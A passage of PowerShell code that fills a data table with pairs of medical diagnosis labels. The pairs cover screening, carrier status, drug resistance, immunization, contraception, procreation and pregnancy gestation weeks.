$DiagnosisList.Rows.Add("Encounter for screening for other infectious and parasitic diseases","Encounter for screening for other infectious and parasitic diseases") + $null = $DiagnosisList.Rows.Add("Encounter for screening for infectious and parasitic diseases, unspecified","Encounter for screening for infectious and parasitic diseases, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasms","Encounter for screening for malignant neoplasm of stomach") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of intestinal tract","Encounter for screening for malignant neoplasm of intestinal tract, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of intestinal tract","Encounter for screening for malignant neoplasm of colon") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of intestinal tract","Encounter for screening for malignant neoplasm of rectum") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of intestinal tract","Encounter for screening for malignant neoplasm of small intestine") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of respiratory organs","Encounter for screening for malignant neoplasm of respiratory organs") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of breast","Encounter for screening mammogram for malignant neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of breast","Encounter for other screening for malignant neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of cervix","Encounter for screening for malignant neoplasm of cervix") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of prostate","Encounter for screening for malignant neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of bladder","Encounter for screening for malignant neoplasm of bladder") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other genitourinary organs","Encounter for screening for malignant neoplasm of testis") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other genitourinary organs","Encounter for screening for malignant neoplasm of vagina") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other genitourinary organs","Encounter for screening for malignant neoplasm of ovary") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other genitourinary organs","Encounter for screening for malignant neoplasm of other genitourinary organs") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other sites","Encounter for screening for malignant neoplasm of oral cavity") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other sites","Encounter for screening for malignant neoplasm of nervous system") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other sites","Encounter for screening for malignant neoplasm of skin") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm of other sites","Encounter for screening for malignant neoplasm of other sites") + $null = $DiagnosisList.Rows.Add("Encounter for screening for malignant neoplasm, site unspecified","Encounter for screening for malignant neoplasm, site unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other diseases and disorders","Encounter for screening for diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other diseases and disorders","Encounter for screening for diabetes mellitus") + $null = $DiagnosisList.Rows.Add("Encounter for screening for nutritional, metabolic and other endocrine disorders","Encounter for screening for nutritional disorder") + $null = $DiagnosisList.Rows.Add("Encounter for screening for metabolic disorder","Encounter for screening for lipoid disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for metabolic disorder","Encounter for screening for other metabolic disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other suspected endocrine disorder","Encounter for screening for other suspected endocrine disorder") + $null = $DiagnosisList.Rows.Add("Encounter for screening for certain developmental disorders in childhood","Encounter for screening for certain developmental disorders in childhood") + $null = $DiagnosisList.Rows.Add("Encounter for screening for eye and ear disorders","Encounter for screening for eye and ear disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for cardiovascular disorders","Encounter for screening for cardiovascular disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for genetic and chromosomal anomalies","Encounter for nonprocreative screening for genetic disease carrier status") + $null = $DiagnosisList.Rows.Add("Encounter for screening for genetic and chromosomal anomalies","Encounter for other screening for genetic and chromosomal anomalies") + $null = $DiagnosisList.Rows.Add("Encounter for screening for digestive system disorders","Encounter for screening for upper gastrointestinal disorder") + $null = $DiagnosisList.Rows.Add("Encounter for screening for digestive system disorders","Encounter for screening for lower gastrointestinal disorder") + $null = $DiagnosisList.Rows.Add("Encounter for screening for digestive system disorders","Encounter for screening for other digestive system disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for musculoskeletal disorder","Encounter for screening for osteoporosis") + $null = $DiagnosisList.Rows.Add("Encounter for screening for musculoskeletal disorder","Encounter for screening for other musculoskeletal disorder") + $null = $DiagnosisList.Rows.Add("Encounter for screening for respiratory disorder NEC","Encounter for screening for respiratory disorder NEC") + $null = $DiagnosisList.Rows.Add("Encounter for screening for dental disorders","Encounter for screening for dental disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for nervous system disorders","Encounter for screening for traumatic brain injury") + $null = $DiagnosisList.Rows.Add("Encounter for screening for nervous system disorders","Encounter for screening for other nervous system disorders") + $null = $DiagnosisList.Rows.Add("Encounter for screening for disorder due to exposure to contaminants","Encounter for screening for disorder due to exposure to contaminants") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other disorder","Encounter for screening for other disorder") + $null = $DiagnosisList.Rows.Add("Encounter for screening, unspecified","Encounter for screening, unspecified") + $null = $DiagnosisList.Rows.Add("Hemophilia A carrier","Asymptomatic hemophilia A carrier") + $null = $DiagnosisList.Rows.Add("Hemophilia A carrier","Symptomatic hemophilia A carrier") + $null = $DiagnosisList.Rows.Add("Cystic fibrosis carrier","Cystic fibrosis carrier") + $null = $DiagnosisList.Rows.Add("Genetic carrier of other disease","Genetic carrier of other disease") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to malignant neoplasm","Genetic susceptibility to malignant neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to malignant neoplasm","Genetic susceptibility to malignant neoplasm of ovary") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to malignant neoplasm","Genetic susceptibility to malignant neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to malignant neoplasm","Genetic susceptibility to malignant neoplasm of endometrium") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to malignant neoplasm","Genetic susceptibility to other malignant neoplasm") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to other disease","Genetic susceptibility to multiple endocrine neoplasia [MEN]") + $null = $DiagnosisList.Rows.Add("Genetic susceptibility to other disease","Genetic susceptibility to other disease") + $null = $DiagnosisList.Rows.Add("Resistance to beta lactam antibiotics","Resistance to unspecified beta lactam antibiotics") + $null = $DiagnosisList.Rows.Add("Resistance to beta lactam antibiotics","Resistance to penicillins") + $null = $DiagnosisList.Rows.Add("Resistance to beta lactam antibiotics","Extended spectrum beta lactamase (ESBL) resistance") + $null = $DiagnosisList.Rows.Add("Resistance to beta lactam antibiotics","Resistance to other specified beta lactam antibiotics") + $null = $DiagnosisList.Rows.Add("Resistance to other antibiotics","Resistance to unspecified antibiotic") + $null = $DiagnosisList.Rows.Add("Resistance to other antibiotics","Resistance to vancomycin") + $null = $DiagnosisList.Rows.Add("Resistance to other antibiotics","Resistance to vancomycin related antibiotics") + $null = $DiagnosisList.Rows.Add("Resistance to other antibiotics","Resistance to quinolones and fluoroquinolones") + $null = $DiagnosisList.Rows.Add("Resistance to other antibiotics","Resistance to multiple antibiotics") + $null = $DiagnosisList.Rows.Add("Resistance to other antibiotics","Resistance to other single specified antibiotic") + $null = $DiagnosisList.Rows.Add("Resistance to other antimicrobial drugs","Resistance to unspecified antimicrobial drugs") + $null = $DiagnosisList.Rows.Add("Resistance to other antimicrobial drugs","Resistance to antiparasitic drug(s)") + $null = $DiagnosisList.Rows.Add("Resistance to other antimicrobial drugs","Resistance to antifungal drug(s)") + $null = $DiagnosisList.Rows.Add("Resistance to other antimicrobial drugs","Resistance to antiviral drug(s)") + $null = $DiagnosisList.Rows.Add("Resistance to antimycobacterial drug(s)","Resistance to single antimycobacterial drug") + $null = $DiagnosisList.Rows.Add("Resistance to antimycobacterial drug(s)","Resistance to multiple antimycobacterial drugs") + $null = $DiagnosisList.Rows.Add("Resistance to multiple antimicrobial drugs","Resistance to multiple antimicrobial drugs") + $null = $DiagnosisList.Rows.Add("Resistance to other specified antimicrobial drug","Resistance to other specified antimicrobial drug") + $null = $DiagnosisList.Rows.Add("Estrogen receptor status","Estrogen receptor positive status [ER+]") + $null = $DiagnosisList.Rows.Add("Estrogen receptor status","Estrogen receptor negative status [ER-]") + $null = $DiagnosisList.Rows.Add("Retained radioactive fragments","Retained depleted uranium fragments") + $null = $DiagnosisList.Rows.Add("Retained radioactive fragments","Other retained radioactive fragments") + $null = $DiagnosisList.Rows.Add("Retained metal fragments","Retained metal fragments, unspecified") + $null = $DiagnosisList.Rows.Add("Retained metal fragments","Retained magnetic metal fragments") + $null = $DiagnosisList.Rows.Add("Retained metal fragments","Retained nonmagnetic metal fragments") + $null = $DiagnosisList.Rows.Add("Retained plastic fragments","Retained plastic fragments") + $null = $DiagnosisList.Rows.Add("Retained organic fragments","Retained animal quills or spines") + $null = $DiagnosisList.Rows.Add("Retained organic fragments","Retained tooth") + $null = $DiagnosisList.Rows.Add("Retained organic fragments","Retained wood fragments") + $null = $DiagnosisList.Rows.Add("Retained organic fragments","Other retained organic fragments") + $null = $DiagnosisList.Rows.Add("Other specified retained foreign body","Retained glass fragments") + $null = $DiagnosisList.Rows.Add("Other specified retained foreign body","Retained stone or crystalline fragments") + $null = $DiagnosisList.Rows.Add("Other specified retained foreign body","Other specified retained foreign body fragments") + $null = $DiagnosisList.Rows.Add("Retained foreign body fragments, unspecified material","Retained foreign body fragments, unspecified material") + $null = $DiagnosisList.Rows.Add("Hormone sensitivity malignancy status","Hormone sensitive malignancy status") + $null = $DiagnosisList.Rows.Add("Hormone sensitivity malignancy status","Hormone resistant malignancy status") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to intestinal infectious diseases","Contact with and (suspected) exposure to intestinal infectious diseases due to Escherichia coli (E. coli)") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to intestinal infectious diseases","Contact with and (suspected) exposure to other intestinal infectious diseases") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to tuberculosis","Contact with and (suspected) exposure to tuberculosis") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to infections with a predominantly sexual mode of transmission","Contact with and (suspected) exposure to infections with a predominantly sexual mode of transmission") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to rabies","Contact with and (suspected) exposure to rabies") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to rubella","Contact with and (suspected) exposure to rubella") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to viral hepatitis","Contact with and (suspected) exposure to viral hepatitis") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to human immunodeficiency virus [HIV]","Contact with and (suspected) exposure to human immunodeficiency virus [HIV]") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to pediculosis, acariasis and other infestations","Contact with and (suspected) exposure to pediculosis, acariasis and other infestations") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other bacterial communicable diseases","Contact with and (suspected) exposure to anthrax") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other bacterial communicable diseases","Contact with and (suspected) exposure to meningococcus") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other bacterial communicable diseases","Contact with and (suspected) exposure to other bacterial communicable diseases") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other viral communicable diseases","Contact with and (suspected) exposure to varicella") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other viral communicable diseases","Contact with and (suspected) exposure to other viral communicable diseases") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to other communicable diseases","Contact with and (suspected) exposure to other communicable diseases") + $null = $DiagnosisList.Rows.Add("Contact with and (suspected) exposure to unspecified communicable disease","Contact with and (suspected) exposure to unspecified communicable disease") + $null = $DiagnosisList.Rows.Add("Asymptomatic human immunodeficiency virus [HIV] infection status","Asymptomatic human immunodeficiency virus [HIV] infection status") + $null = $DiagnosisList.Rows.Add("Carrier of infectious disease","Carrier of typhoid") + $null = $DiagnosisList.Rows.Add("Carrier of infectious disease","Carrier of other intestinal infectious diseases") + $null = $DiagnosisList.Rows.Add("Carrier of infectious disease","Carrier of diphtheria") + $null = $DiagnosisList.Rows.Add("Carrier of other specified bacterial diseases","Carrier of bacterial disease due to meningococci") + $null = $DiagnosisList.Rows.Add("Carrier of bacterial disease due to staphylococci","Carrier or suspected carrier of Methicillin susceptible Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Carrier of bacterial disease due to staphylococci","Carrier or suspected carrier of Methicillin resistant Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Carrier of bacterial disease due to streptococci","Carrier of Group B streptococcus") + $null = $DiagnosisList.Rows.Add("Carrier of bacterial disease due to streptococci","Carrier of other streptococcus") + $null = $DiagnosisList.Rows.Add("Carrier of other specified bacterial diseases","Carrier of other specified bacterial diseases") + $null = $DiagnosisList.Rows.Add("Carrier of infections with a predominantly sexual mode of transmission","Carrier of infections with a predominantly sexual mode of transmission") + $null = $DiagnosisList.Rows.Add("Carrier of human T-lymphotropic virus type-1 [HTLV-1] infection","Carrier of human T-lymphotropic virus type-1 [HTLV-1] infection") + $null = $DiagnosisList.Rows.Add("Carrier of other infectious diseases","Carrier of other infectious diseases") + $null = $DiagnosisList.Rows.Add("Carrier of infectious disease, unspecified","Carrier of infectious disease, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for immunization","Encounter for immunization") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of contraindication","Immunization not carried out because of acute illness of patient") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of contraindication","Immunization not carried out because of chronic illness or condition of patient") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of contraindication","Immunization not carried out because of immune compromised state of patient") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of contraindication","Immunization not carried out because of patient allergy to vaccine or component") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of contraindication","Immunization not carried out because of other contraindication") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of patient decision for reasons of belief or group pressure","Immunization not carried out because of patient decision for reasons of belief or group pressure") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of patient decision for other and unspecified reason","Immunization not carried out because of patient decision for unspecified reason") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of patient decision for other and unspecified reason","Immunization not carried out because of patient refusal") + $null = $DiagnosisList.Rows.Add("Immunization not carried out because of patient decision for other and unspecified reason","Immunization not carried out because of patient decision for other reason") + $null = $DiagnosisList.Rows.Add("Underimmunization status","Underimmunization status") + $null = $DiagnosisList.Rows.Add("Immunization not carried out for other reason","Immunization not carried out due to patient having had the disease") + $null = $DiagnosisList.Rows.Add("Immunization not carried out for other reason","Immunization not carried out because of caregiver refusal") + $null = $DiagnosisList.Rows.Add("Immunization not carried out for other reason","Immunization not carried out for other reason") + $null = $DiagnosisList.Rows.Add("Immunization not carried out for unspecified reason","Immunization not carried out for unspecified reason") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic immunotherapy","Encounter for prophylactic immunotherapy for respiratory syncytial virus (RSV)") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic immunotherapy","Encounter for prophylactic antivenin") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic immunotherapy","Encounter for prophylactic Rho(D) immune globulin") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic immunotherapy","Encounter for prophylactic rabies immune globin") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic fluoride administration","Encounter for prophylactic fluoride administration") + $null = $DiagnosisList.Rows.Add("Encounter for other specified prophylactic measures","Encounter for other specified prophylactic measures") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic measures, unspecified","Encounter for prophylactic measures, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of contraceptive pills") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for prescription of emergency contraception") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of injectable contraceptive") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of intrauterine contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of vaginal ring hormonal contraceptive") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of transdermal patch hormonal contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of implantable subdermal contraceptive") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of other contraceptives") + $null = $DiagnosisList.Rows.Add("Encounter for initial prescription of contraceptives","Encounter for initial prescription of contraceptives, unspecified") + $null = $DiagnosisList.Rows.Add("Counseling and instruction in natural family planning to avoid pregnancy","Counseling and instruction in natural family planning to avoid pregnancy") + $null = $DiagnosisList.Rows.Add("Encounter for other general counseling and advice on contraception","Encounter for other general counseling and advice on contraception") + $null = $DiagnosisList.Rows.Add("Encounter for sterilization","Encounter for sterilization") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of contraceptives","Encounter for surveillance of contraceptives, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of contraceptives","Encounter for surveillance of contraceptive pills") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of contraceptives","Encounter for surveillance of injectable contraceptive") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of intrauterine contraceptive device","Encounter for insertion of intrauterine contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of intrauterine contraceptive device","Encounter for routine checking of intrauterine contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of intrauterine contraceptive device","Encounter for removal of intrauterine contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of intrauterine contraceptive device","Encounter for removal and reinsertion of intrauterine contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of vaginal ring hormonal contraceptive device","Encounter for surveillance of vaginal ring hormonal contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of transdermal patch hormonal contraceptive device","Encounter for surveillance of transdermal patch hormonal contraceptive device") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of implantable subdermal contraceptive","Encounter for surveillance of implantable subdermal contraceptive") + $null = $DiagnosisList.Rows.Add("Encounter for surveillance of other contraceptives","Encounter for surveillance of other contraceptives") + $null = $DiagnosisList.Rows.Add("Encounter for other contraceptive management","Encounter for other contraceptive management") + $null = $DiagnosisList.Rows.Add("Encounter for contraceptive management, unspecified","Encounter for contraceptive management, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for procreative management","Encounter for reversal of previous sterilization") + $null = $DiagnosisList.Rows.Add("Encounter for procreative investigation and testing","Encounter for fertility testing") + $null = $DiagnosisList.Rows.Add("Encounter for procreative investigation and testing","Aftercare following sterilization reversal") + $null = $DiagnosisList.Rows.Add("Encounter for genetic testing of female for procreative management","Encounter of female for testing for genetic disease carrier status for procreative management") + $null = $DiagnosisList.Rows.Add("Encounter for genetic testing of female for procreative management","Encounter for other genetic testing of female for procreative management") + $null = $DiagnosisList.Rows.Add("Encounter for genetic testing of male for procreative management","Encounter of male for testing for genetic disease carrier status for procreative management") + $null = $DiagnosisList.Rows.Add("Encounter for genetic testing of male for procreative management","Encounter for testing of male partner of patient with recurrent pregnancy loss") + $null = $DiagnosisList.Rows.Add("Encounter for genetic testing of male for procreative management","Encounter for other genetic testing of male for procreative management") + $null = $DiagnosisList.Rows.Add("Encounter for other procreative investigation and testing","Encounter for other procreative investigation and testing") + $null = $DiagnosisList.Rows.Add("Encounter for procreative genetic counseling","Encounter for procreative genetic counseling") + $null = $DiagnosisList.Rows.Add("Encounter for general counseling and advice on procreation","Procreative counseling and advice using natural family planning") + $null = $DiagnosisList.Rows.Add("Encounter for general counseling and advice on procreation","Encounter for fertility preservation counseling") + $null = $DiagnosisList.Rows.Add("Encounter for general counseling and advice on procreation","Encounter for other general counseling and advice on procreation") + $null = $DiagnosisList.Rows.Add("Encounter for procreative management and counseling for gestational carrier","Encounter for procreative management and counseling for gestational carrier") + $null = $DiagnosisList.Rows.Add("Encounter for other procreative management","Encounter for male factor infertility in female patient") + $null = $DiagnosisList.Rows.Add("Encounter for other procreative management","Encounter for Rh incompatibility status") + $null = $DiagnosisList.Rows.Add("Encounter for other procreative management","Encounter for assisted reproductive fertility procedure cycle") + $null = $DiagnosisList.Rows.Add("Encounter for other procreative management","Encounter for fertility preservation procedure") + $null = $DiagnosisList.Rows.Add("Encounter for other procreative management","Encounter for other procreative management") + $null = $DiagnosisList.Rows.Add("Encounter for procreative management, unspecified","Encounter for procreative management, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for pregnancy test","Encounter for pregnancy test, result unknown") + $null = $DiagnosisList.Rows.Add("Encounter for pregnancy test","Encounter for pregnancy test, result positive") + $null = $DiagnosisList.Rows.Add("Encounter for pregnancy test","Encounter for pregnancy test, result negative") + $null = $DiagnosisList.Rows.Add("Encounter for childbirth instruction","Encounter for childbirth instruction") + $null = $DiagnosisList.Rows.Add("Encounter for childcare instruction","Encounter for childcare instruction") + $null = $DiagnosisList.Rows.Add("Pregnant state","Pregnant state, incidental") + $null = $DiagnosisList.Rows.Add("Pregnant state","Encounter for elective termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Pregnant state","Pregnant state, gestational carrier") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal first pregnancy","Encounter for supervision of normal first pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal first pregnancy","Encounter for supervision of normal first pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal first pregnancy","Encounter for supervision of normal first pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal first pregnancy","Encounter for supervision of normal first pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of other normal pregnancy","Encounter for supervision of other normal pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of other normal pregnancy","Encounter for supervision of other normal pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of other normal pregnancy","Encounter for supervision of other normal pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of other normal pregnancy","Encounter for supervision of other normal pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal pregnancy, unspecified","Encounter for supervision of normal pregnancy, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal pregnancy, unspecified","Encounter for supervision of normal pregnancy, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal pregnancy, unspecified","Encounter for supervision of normal pregnancy, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Encounter for supervision of normal pregnancy, unspecified","Encounter for supervision of normal pregnancy, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening of mother","Encounter for antenatal screening for chromosomal anomalies") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening of mother","Encounter for antenatal screening for raised alphafetoprotein level") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening of mother","Encounter for other antenatal screening follow-up") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening of mother","Encounter for antenatal screening for malformations") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening of mother","Encounter for antenatal screening for fetal growth retardation") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening of mother","Encounter for antenatal screening for isoimmunization") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for hydrops fetalis") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for nuchal translucency") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for fetal screening for congenital cardiac abnormalities") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for fetal lung maturity") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for Streptococcus B") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for cervical length") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for uncertain dates") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for fetal macrosomia") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for other specified antenatal screening") + $null = $DiagnosisList.Rows.Add("Encounter for other antenatal screening","Encounter for antenatal screening for other genetic defects") + $null = $DiagnosisList.Rows.Add("Encounter for antenatal screening, unspecified","Encounter for antenatal screening, unspecified") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, unspecified or less than 10 weeks","Weeks of gestation of pregnancy not specified") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, unspecified or less than 10 weeks","Less than 8 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, unspecified or less than 10 weeks","8 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, unspecified or less than 10 weeks","9 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","10 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","11 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","12 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","13 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","14 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","15 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","16 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","17 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","18 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 10-19","19 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","20 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","21 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","22 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","23 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","24 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","25 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","26 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","27 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","28 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 20-29","29 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","30 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","31 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","32 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","33 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","34 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","35 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","36 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","37 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","38 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 30-39","39 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 40 or greater","40 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 40 or greater","41 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 40 or greater","42 weeks gestation of pregnancy") + $null = $DiagnosisList.Rows.Add("Weeks of gestation of pregnancy, weeks 40 or greater","Greater than 42 weeks gestation of pregnancy") + $null = 